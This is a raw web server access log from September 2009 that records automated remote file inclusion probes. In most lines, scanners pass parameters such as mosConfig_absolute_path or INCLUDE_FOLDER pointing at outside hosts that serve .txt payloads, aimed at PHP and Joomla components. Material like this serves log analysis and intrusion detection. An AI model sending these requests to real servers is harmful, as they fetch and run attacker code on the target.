92.50.143.90 - - [07/Sep/2009:13:01:31 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:31 -0500] "GET /logs/access_log.1245801600/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:31 -0500] "GET /logs/access_log.1243468800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:41 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:42 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:13:01:46 -0500] "GET /logs/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:13:01:46 -0500] "GET /admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:13:01:46 -0500] "GET /logs/access_log.1242691200/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:50 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:55 -0500] "GET /logs/access_log.1246406400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:02:05 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:02:17 -0500] "GET /logs/access_log.1247788800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:02:27 -0500] "GET /logs/access_log.1244764800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:02:32 -0500] "GET /logs/access_log.1244764800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
65.55.106.161 - - [07/Sep/2009:13:02:34 -0500] "GET /logs/access_log.1242691200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.23.4 - - [07/Sep/2009:13:02:37 -0500] "GET /logs/access_log.1244764800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:02:55 -0500] "GET /logs/access_log.1243036800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:03:08 -0500] "GET /logs/access_log.1243036800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:03:09 -0500] "GET /logs/access_log.1243036800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:13:03:12 -0500] "GET /logs/access_log.1243468800/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:03:19 -0500] "GET /logs/access_log.1245801600/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:03:27 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:03:38 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:13:03:59 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:13:03:59 -0500] "GET /logs/access_log.1235174400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:13:03:59 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:13:04:12 -0500] "GET /logs/access_log.1235174400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:13:04:12 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:13:04:12 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:13:04:24 -0500] "GET /logs/access_log.1235174400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:13:04:24 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:13:04:24 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:04:48 -0500] "GET /logs/access_log.1247788800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:13:04:59 -0500] "GET /logs/access_log.1235174400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:13:04:59 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:13:05:00 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:05:27 -0500] "GET /logs/access_log.1238544000/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:05:27 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
65.55.106.229 - - [07/Sep/2009:13:05:33 -0500] "GET /logs/access_log.1238803200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.50.143.90 - - [07/Sep/2009:13:05:36 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 40787 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:05:42 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:05:45 -0500] "GET /logs/access_log.1243468800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:05:58 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:06:01 -0500] "GET /logs/access_log.1247356800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:06:07 -0500] "GET /logs/access_log.1244764800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:06:07 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:06:09 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:06:16 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:06:19 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:06:19 -0500] "GET /logs/access_log.1244764800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:06:21 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:07:59 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:07:59 -0500] "GET /logs/access_log.1244764800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:08:11 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:08:32 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:08:32 -0500] "GET /logs/access_log.1241222400%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:08:40 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:08:56 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:08:56 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:09:01 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:09:02 -0500] "GET /logs/access_log.1244764800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:09:02 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:09:17 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:09:20 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:09:38 -0500] "GET /logs/access_log.1237852800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
64.6.232.171 - - [07/Sep/2009:13:09:44 -0500] "GET /?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
64.6.232.171 - - [07/Sep/2009:13:09:45 -0500] "GET /logs/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 204070 "-""libwww-perl/5.805"
121.254.195.7 - - [07/Sep/2009:13:10:52 -0500] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
92.50.143.90 - - [07/Sep/2009:13:11:01 -0500] "GET /logs/access_log.1241222400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:01 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:07 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:08 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:08 -0500] "GET /logs/access_log.1238544000/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:16 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:40 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:40 -0500] "GET /logs/access_log.1238371200/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:46 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:11:52 -0500] "GET /logs/access_log.1238457600/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.4 - - [07/Sep/2009:13:11:54 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
77.221.130.4 - - [07/Sep/2009:13:11:54 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
118.45.190.166 - - [07/Sep/2009:13:12:04 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
118.45.190.166 - - [07/Sep/2009:13:12:04 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
118.45.190.166 - - [07/Sep/2009:13:12:04 -0500] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.208 - - [07/Sep/2009:13:12:34 -0500] "GET /logs/access_log.1233014400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.45.190.166 - - [07/Sep/2009:13:12:34 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.4 - - [07/Sep/2009:13:12:36 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
77.221.130.4 - - [07/Sep/2009:13:12:36 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
92.50.143.90 - - [07/Sep/2009:13:12:45 -0500] "GET /logs/access_log.1241222400/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:12:45 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:12:59 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:13:35 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:13:35 -0500] "GET /logs/access_log.1238371200/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:13:35 -0500] "GET /logs/access_log.1238457600/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:13:36 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:13:36 -0500] "GET /logs/access_log.1238371200/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:13:36 -0500] "GET /logs/access_log.1238457600/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:13:37 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
64.6.232.171 - - [07/Sep/2009:13:13:37 -0500] "GET /?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
222.239.227.142 - - [07/Sep/2009:13:13:37 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
64.6.232.171 - - [07/Sep/2009:13:13:37 -0500] "GET /logs/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 204070 "-""libwww-perl/5.805"
65.55.230.165 - - [07/Sep/2009:13:15:24 -0500] "GET /logs/access_log.1246060800 HTTP/1.1" 200 536626 "-""Mozilla/4.0"
65.55.230.165 - - [07/Sep/2009:13:15:48 -0500] "GET /logs/access_log.1247270400 HTTP/1.1" 200 796581 "-""Mozilla/4.0"
211.189.18.73 - - [07/Sep/2009:13:18:24 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:13:18:25 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:13:18:35 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:13:18:36 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
77.221.130.4 - - [07/Sep/2009:13:18:36 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
77.221.130.4 - - [07/Sep/2009:13:18:36 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
77.221.130.4 - - [07/Sep/2009:13:18:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
77.221.130.4 - - [07/Sep/2009:13:18:45 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Sep/2009:13:19:04 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:19:04 -0500] "GET /logs/access_log.1244678400/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:19:04 -0500] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:19:09 -0500] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:20:02 -0500] "GET /logs/access_log.1237852800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:20:02 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:20:13 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:24 -0500] "GET /logs/access_log.1244678400/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:24 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:24 -0500] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:29 -0500] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:47 -0500] "GET /logs/access_log.1244678400/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:47 -0500] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:47 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:13:20:51 -0500] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
65.55.106.211 - - [07/Sep/2009:13:21:03 -0500] "GET /logs/access_log.1126656000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.239.227.142 - - [07/Sep/2009:13:21:11 -0500] "GET /logs/access_log.1242518400/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:21:11 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:21:11 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:21:11 -0500] "GET /logs/access_log.1242518400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:21:13 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:21:13 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:13:21:26 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:13:21:26 -0500] "GET /logs/access_log.1241913600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:13:21:27 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HT